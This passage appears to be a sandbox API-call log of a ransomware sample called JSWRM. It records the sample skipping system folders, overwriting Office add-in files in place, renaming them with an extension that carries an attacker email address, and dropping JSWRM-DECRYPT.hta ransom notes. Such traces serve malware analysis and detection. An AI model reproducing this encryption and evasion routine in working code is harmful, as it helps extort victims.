lpWideCharStr="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", cchWideChar=60, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 60 [0124.290] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d698 [0124.290] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", cchWideChar=60, lpMultiByteStr=0x20d698, cbMultiByte=60, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", lpUsedDefaultChar=0x0) returned 60 [0124.290] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225878 | out: hHeap=0x1e0000) returned 1 [0124.290] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x120) returned 0x23ede0 [0124.290] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23f280 | out: hHeap=0x1e0000) returned 1 [0124.290] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d698 | out: hHeap=0x1e0000) returned 1 [0124.290] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dba8 | out: hHeap=0x1e0000) returned 1 [0124.290] FindNextFileW (in: hFindFile=0x232080, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1434d390, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1434d390, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x14589889, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x4df89, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="PowerViewRes.id.xap", cAlternateFileName="POWERV~1.XAP")) returned 1 [0124.290] lstrcmpiW (lpString1="PowerViewRes.id.xap", lpString2=".") returned 1 [0124.290] lstrcmpiW (lpString1="PowerViewRes.id.xap", lpString2="..") returned 1 [0124.290] lstrcmpiW (lpString1="PowerViewRes.id.xap", lpString2="...") returned 1 [0124.290] lstrcmpiW (lpString1="PowerViewRes.id.xap", lpString2="windows") returned -1 [0124.290] lstrcmpiW (lpString1="PowerViewRes.id.xap", lpString2="recovery") returned -1 [0124.290] lstrcmpiW (lpString1="PowerViewRes.id.xap", lpString2="perflogs") returned 1 [0124.290] lstrcmpiW (lpString1="PowerViewRes.id.xap", lpString2="documents and settings") returned 1 [0124.290] lstrcmpiW (lpString1="PowerViewRes.id.xap", lpString2="$RECYCLE.BIN") returned 1 [0124.290] lstrcmpiW (lpString1="PowerViewRes.id.xap", lpString2="system volume information") returned -1 [0124.290] lstrcmpiW (lpString1="PowerViewRes.id.xap", lpString2="msocache") returned 1 [0124.290] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0124.290] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PowerViewRes.id.xap", cchWideChar=19, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0124.290] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PowerViewRes.id.xap", cchWideChar=19, lpMultiByteStr=0x241268, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PowerViewRes.id.xap", lpUsedDefaultChar=0x0) returned 19 [0124.290] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0124.290] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PowerViewRes.id.xap", cchWideChar=19, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0124.290] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PowerViewRes.id.xap", cchWideChar=19, lpMultiByteStr=0x241218, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PowerViewRes.id.xap", lpUsedDefaultChar=0x0) returned 19 [0124.290] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0124.291] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23ede0 | out: hHeap=0x1e0000) returned 1 [0124.291] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0124.291] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e22c, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0124.291] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Power View Excel Add-in\\id\\PowerViewRes.id.xap" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\power view excel add-in\\id\\powerviewres.id.xap"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x338 [0124.291] GetFileSizeEx (in: hFile=0x338, lpFileSize=0x345e1c0 | out: lpFileSize=0x345e1c0*=319369) returned 1 [0124.291] SetFilePointer (in: hFile=0x338, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0124.292] ReadFile (in: hFile=0x338, lpBuffer=0x24f1e0, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345e1cc, lpOverlapped=0x0 | out: lpBuffer=0x24f1e0*, lpNumberOfBytesRead=0x345e1cc*=0x27100, lpOverlapped=0x0) returned 1 [0124.307] SetFilePointer (in: hFile=0x338, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0124.307] WriteFile (in: hFile=0x338, lpBuffer=0x24f1e0*, nNumberOfBytesToWrite=0x27100, lpNumberOfBytesWritten=0x345e1c8, lpOverlapped=0x0 | out: lpBuffer=0x24f1e0*, lpNumberOfBytesWritten=0x345e1c8*=0x27100, lpOverlapped=0x0) returned 1 [0124.308] CloseHandle (hObject=0x338) returned 1 [0124.308] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Power View Excel Add-in\\id\\PowerViewRes.id.xap" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\power view excel add-in\\id\\powerviewres.id.xap"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Power View Excel Add-in\\id\\PowerViewRes.id.xap.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\power view excel add-in\\id\\powerviewres.id.xap.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0124.309] FindNextFileW (in: hFindFile=0x232080, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1434d390, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1434d390, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x14589889, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x4df89, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="PowerViewRes.id.xap", cAlternateFileName="POWERV~1.XAP")) returned 0 [0124.309] FindClose (in: hFindFile=0x232080 | out: hFindFile=0x232080) returned 1 [0124.310] FindNextFileW (in: hFindFile=0x231e00, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf964b3dd, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x14969496, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x14969496, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xf1550, dwReserved1=0x0, cFileName="it", cAlternateFileName="")) returned 1 [0124.310] lstrcmpiW (lpString1="it", lpString2=".") returned 1 [0124.310] lstrcmpiW (lpString1="it", lpString2="..") returned 1 [0124.310] lstrcmpiW (lpString1="it", lpString2="...") returned 1 [0124.310] lstrcmpiW (lpString1="it", lpString2="windows") returned -1 [0124.310] lstrcmpiW (lpString1="it", lpString2="recovery") returned -1 [0124.310] lstrcmpiW (lpString1="it", lpString2="perflogs") returned -1 [0124.310] lstrcmpiW (lpString1="it", lpString2="documents and settings") returned 1 [0124.310] lstrcmpiW (lpString1="it", lpString2="$RECYCLE.BIN") returned 1 [0124.310] lstrcmpiW (lpString1="it", lpString2="system volume information") returned -1 [0124.310] lstrcmpiW (lpString1="it", lpString2="msocache") returned -1 [0124.310] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Power View Excel Add-in\\it\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\power view excel add-in\\it\\jswrm-decrypt.hta")) returned 0xffffffff [0124.311] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0124.311] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345b424, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0124.312] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Power View Excel Add-in\\it\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\power view excel add-in\\it\\jswrm-decrypt.hta"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0124.313] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0124.313] WriteFile (in: hFile=0x314, lpBuffer=0x345b538*, nNumberOfBytesToWrite=0x230c, lpNumberOfBytesWritten=0x345b504, lpOverlapped=0x0 | out: lpBuffer=0x345b538*, lpNumberOfBytesWritten=0x345b504*=0x230c, lpOverlapped=0x0) returned 1 [0124.314] CloseHandle (hObject=0x314) returned 1 [0124.314] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Power View Excel Add-in\\it\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\power view excel add-in\\it\\jswrm-decrypt.hta")) returned 0x20 [0124.314] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Power View Excel Add-in\\it\\*.*", lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf964b3dd, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x14969496, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x40c2c386, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName=".", cAlternateFileName="")) returned 0x232140 [0124.314] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0124.314] FindNextFileW (in: hFindFile=0x232140, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf964b3dd, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x14969496, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x40c2c386, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="..", cAlternateFileName="")) returned 1 [0124.314] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0124.314] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0124.314] FindNextFileW (in: hFindFile=0x232140, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x6840bbc, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x6840bbc, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x152f2ade, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xc4e58, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="AdHocReportingExcelClient.dll", cAlternateFileName="ADHOCR~1.DLL")) returned 1 [0124.314] lstrcmpiW (lpString1="AdHocReportingExcelClient.dll", lpString2=".") returned 1 [0124.314] lstrcmpiW (lpString1="AdHocReportingExcelClient.dll", lpString2="..") returned 1 [0124.314] lstrcmpiW (lpString1="AdHocReportingExcelClient.dll", lpString2="...") returned 1 [0124.314] lstrcmpiW (lpString1="AdHocReportingExcelClient.dll", lpString2="windows") returned -1 [0124.314] lstrcmpiW (lpString1="AdHocReportingExcelClient.dll", lpString2="recovery") returned -1 [0124.314] lstrcmpiW (lpString1="AdHocReportingExcelClient.dll", lpString2="perflogs") returned -1 [0124.314] lstrcmpiW (lpString1="AdHocReportingExcelClient.dll", lpString2="documents and settings") returned -1 [0124.314] lstrcmpiW (lpString1="AdHocReportingExcelClient.dll", lpString2="$RECYCLE.BIN") returned 1 [0124.314] lstrcmpiW (lpString1="AdHocReportingExcelClient.dll", lpString2="system volume information") returned -1 [0124.314] lstrcmpiW (lpString1="AdHocReportingExcelClient.dll", lpString2="msocache") returned -1 [0124.314] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dba8 [0124.314] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AdHocReportingExcelClient.dll", cchWideChar=29, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 29 [0124.315] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241330 [0124.315] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AdHocReportingExcelClient.dll", cchWideChar=29, lpMultiByteStr=0x241330, cbMultiByte=29, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AdHocReportingExcelClient.dll", lpUsedDefaultChar=0x0) returned 29 [0124.315] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AdHocReportingExcelClient.dll", cchWideChar=29, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 29 [0124.315] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241060 [0124.315] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AdHocReportingExcelClient.dll", cchWideChar=29, lpMultiByteStr=0x241060, cbMultiByte=29, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AdHocReportingExcelClient.dll", lpUsedDefaultChar=0x0) returned 29 [0124.315] FindNextFileW (in: hFindFile=0x232140, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x40c2c386, ftCreationTime.dwHighDateTime=0x1d53d3c, ftLastAccessTime.dwLowDateTime=0x40c2c386, ftLastAccessTime.dwHighDateTime=0x1d53d3c, ftLastWriteTime.dwLowDateTime=0x40c2c386, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x230c, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="JSWRM-DECRYPT.hta", cAlternateFileName="JSWRM-~1.HTA")) returned 1 [0124.315] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2=".") returned 1 [0124.315] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="..") returned 1 [0124.315] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="...") returned 1 [0124.315] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="windows") returned -1 [0124.315] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="recovery") returned -1 [0124.315] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="perflogs") returned -1 [0124.315] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="documents and settings") returned 1 [0124.315] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="$RECYCLE.BIN") returned 1 [0124.315] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="system volume information") returned -1 [0124.315] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="msocache") returned -1 [0124.315] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0124.315] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0124.315] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241308 [0124.315] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x241308, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0124.315] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0124.315] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241060 [0124.315] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x241060, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0124.315] FindNextFileW (in: hFindFile=0x232140, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x865a7d2, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x865a7d2, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x8680a1e, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x13068, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="Microsoft.PowerBI.Diagnostics.resources.dll", cAlternateFileName="MICROS~3.DLL")) returned 1 [0124.315] lstrcmpiW (lpString1="Microsoft.PowerBI.Diagnostics.resources.dll", lpString2=".") returned 1 [0124.315] lstrcmpiW (lpString1="Microsoft.PowerBI.Diagnostics.resources.dll", lpString2="..") returned 1 [0124.315] lstrcmpiW (lpString1="Microsoft.PowerBI.Diagnostics.resources.dll", lpString2="...") returned 1 [0124.315] lstrcmpiW (lpString1="Microsoft.PowerBI.Diagnostics.resources.dll", lpString2="windows") returned -1 [0124.315] lstrcmpiW (lpString1="Microsoft.PowerBI.Diagnostics.resources.dll", lpString2="recovery") returned -1 [0124.315] lstrcmpiW (lpString1="Microsoft.PowerBI.Diagnostics.resources.dll", lpString2="perflogs") returned -1 [0124.315] lstrcmpiW (lpString1="Microsoft.PowerBI.Diagnostics.resources.dll", lpString2="documents and settings") returned 1 [0124.315] lstrcmpiW (lpString1="Microsoft.PowerBI.Diagnostics.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0124.316] lstrcmpiW (lpString1="Microsoft.PowerBI.Diagnostics.resources.dll", lpString2="system volume information") returned -1 [0124.316] lstrcmpiW (lpString1="Microsoft.PowerBI.Diagnostics.resources.dll", lpString2="msocache") returned -1 [0124.316] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x2331c8 [0124.316] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.PowerBI.Diagnostics.resources.dll", cchWideChar=43, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 43 [0124.316] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0124.316] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.PowerBI.Diagnostics.resources.dll", cchWideChar=43, lpMultiByteStr=0x22d260, cbMultiByte=43, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.PowerBI.Diagnostics.resources.dll", lpUsedDefaultChar=0x0) returned 43 [0124.316] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.PowerBI.Diagnostics.resources.dll", cchWideChar=43, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 43 [0124.316] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0124.316] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.PowerBI.Diagnostics.resources.dll", cchWideChar=43, lpMultiByteStr=0x22ce70, cbMultiByte=43, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.PowerBI.Diagnostics.resources.dll", lpUsedDefaultChar=0x0) returned 43 [0124.316] FindNextFileW (in: hFindFile=0x232140, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf99b89f6, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf99b89f6, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf99b89f6, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x13078, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", cAlternateFileName="MICROS~2.DLL")) returned 1 [0124.316] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", lpString2=".") returned 1 [0124.316] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", lpString2="..") returned 1 [0124.316] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", lpString2="...") returned 1 [0124.316] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", lpString2="windows") returned -1 [0124.316] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", lpString2="recovery") returned -1 [0124.316] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", lpString2="perflogs") returned -1 [0124.316] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", lpString2="documents and settings") returned 1 [0124.316] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0124.316] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", lpString2="system volume information") returned -1 [0124.316] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", lpString2="msocache") returned -1 [0124.316] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225768 [0124.316] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", cchWideChar=60, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 60 [0124.316] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dba8 [0124.316] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", cchWideChar=60, lpMultiByteStr=0x20dba8, cbMultiByte=60, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", lpUsedDefaultChar=0x0) returned 60 [0124.316] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", cchWideChar=60, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 60 [0124.316] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dde8 [0124.316] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", cchWideChar=60, lpMultiByteStr=0x20dde8, cbMultiByte=60, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", lpUsedDefaultChar=0x0) returned 60 [0124.316] FindNextFileW (in: hFindFile=0x232140, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf964b3dd, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf964b3dd, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf99462e6, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x4eb8, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", cAlternateFileName="MICROS~1.DLL")) returned 1 [0124.316] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", lpString2=".") returned 1 [0124.316] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", lpString2="..") returned 1 [0124.316] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", lpString2="...") returned 1 [0124.316] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", lpString2="windows") returned -1 [0124.317] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", lpString2="recovery") returned -1 [0124.317] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", lpString2="perflogs") returned -1 [0124.317] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", lpString2="documents and settings") returned 1 [0124.317] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0124.317] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", lpString2="system volume information") 